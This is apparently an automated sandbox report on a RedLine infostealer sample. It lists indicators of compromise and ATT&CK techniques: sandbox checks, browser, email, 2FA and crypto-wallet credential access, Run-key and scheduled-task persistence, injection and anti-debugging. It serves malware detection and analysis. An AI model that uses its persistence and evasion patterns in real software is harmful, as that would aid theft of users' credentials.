redline | c48cd55efee57f0b7ff4547a0a20ebfbdf4188d059512b10a29879bf30c4fc19

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5852696.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5852696.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	79D2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	79D2.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation	Wapuraekefu.exe

Loads dropped DLL 46 IoCs

pid	Process
4612	setup_install.exe
4612	setup_install.exe
4612	setup_install.exe
4612	setup_install.exe
4612	setup_install.exe
4612	setup_install.exe
4204	Sun054fe19a12cb3.tmp
3244	setup_2.tmp
1460	setup_2.tmp
5284	rundll32.exe
5604	rundll32.exe
3728	Sun05ac1b0207d3ff3b8.exe
3728	Sun05ac1b0207d3ff3b8.exe
6112	rundll32.exe
6968	installer.exe
6968	installer.exe
6968	installer.exe
6976	MsiExec.exe
6976	MsiExec.exe
4416	rundll32.exe
4876	MsiExec.exe
4876	MsiExec.exe
4876	MsiExec.exe
4876	MsiExec.exe
4876	MsiExec.exe
4876	MsiExec.exe
4876	MsiExec.exe
4876	MsiExec.exe
4876	MsiExec.exe
4876	MsiExec.exe
6968	installer.exe
4876	MsiExec.exe
4876	MsiExec.exe
6380	MsiExec.exe
6380	MsiExec.exe
6380	MsiExec.exe
6380	MsiExec.exe
6380	MsiExec.exe
6380	MsiExec.exe
6380	MsiExec.exe
4876	MsiExec.exe
5504	26FE.exe
5504	26FE.exe
5504	26FE.exe
5504	26FE.exe
5504	26FE.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral9/memory/2212-324-0x0000000000B40000-0x0000000000B41000-memory.dmp	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	5968156.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft.NET\\Jukewasuku.exe\""	46807GHF____.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	5852696.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	79D2.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\T:	installer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	ip-api.com
121	ip-api.com

Drops file in System32 directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #6	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #5	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #1	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\services64	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #3	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #2	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #4	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 4BD7A5D6AB5F309D	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedUpdater	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2212	5852696.exe
3904	79D2.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1612 set thread context of 1220	1612	2611909.exe	134
PID 2736 set thread context of 5436	2736	svchost.exe	147
PID 4032 set thread context of 6724	4032	services64.exe	213

Drops file in Program Files directory 18 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft.NET\Jukewasuku.exe.config	46807GHF____.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url	msiexec.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-8KHRG.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\Microsoft.NET\Jukewasuku.exe	46807GHF____.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini	msiexec.exe
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-7QN8J.tmp	setup_2.tmp
File created	C:\Program Files\Windows Security\WKLLEUPVJP\ultramediaburner.exe.config	46807GHF____.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-3P0TN.tmp	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe	msiexec.exe
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files\Windows Security\WKLLEUPVJP\ultramediaburner.exe	46807GHF____.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe	msiexec.exe

Drops file in Windows directory 42 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI5882.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI59EB.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI79AC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI767C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7719.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\f75542c.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI68E4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI75EF.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI69EF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6CA1.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\Installer\f75542c.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI593E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5B75.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6CD0.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7446.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\MSI5B26.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI74A4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7522.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI734B.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\MSI5600.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5A89.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6809.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6B96.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\f75542f.msi	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 16 IoCs

pid	pid_target	Process	procid_target
4924	3144	WerFault.exe	81
4568	2564	WerFault.exe	102
4200	3144	WerFault.exe	81
4216	2564	WerFault.exe	102
1324	3144	WerFault.exe	81
4608	2564	WerFault.exe	102
3800	3144	WerFault.exe	81
4840	2564	WerFault.exe	102
3828	1780	WerFault.exe	101
3580	2564	WerFault.exe	102
4852	1612	WerFault.exe	132
644	2564	WerFault.exe	102
2060	3144	WerFault.exe	81
5128	2564	WerFault.exe	102
1768	3144	WerFault.exe	81
5772	3144	WerFault.exe	81

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jcsrdgu
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jcsrdgu
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jcsrdgu
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun05532f7abc.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun05532f7abc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jcsrdgu
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jcsrdgu
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jcsrdgu
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jcsrdgu
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jcsrdgu
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jcsrdgu
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun05532f7abc.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Sun05ac1b0207d3ff3b8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Sun05ac1b0207d3ff3b8.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
5668	schtasks.exe
5884	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
2060	timeout.exe
5068	timeout.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
5680	taskkill.exe
5572	taskkill.exe
5448	taskkill.exe
4068	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies data under HKEY_USERS 22 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\16\52C64B7E	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	svchost.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "268435456"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\M1033Mark"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "70"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = b9d9ec28329fd701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\dtscout.com\ = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "804"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216"	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "English Phone Converter"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";"	msiexec.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mj22.xyz\ = "580"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\NextBrowserDataLogTime = 70c91b10d8a7d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CRLs	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "{2984A9DB-5689-43AD-877D-14999A15DD46}"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "Microsoft Zira Mobile - English (United States)"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "89"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 61b5e968a7a7d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mj22.xyz\ = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople	MicrosoftEdge.exe
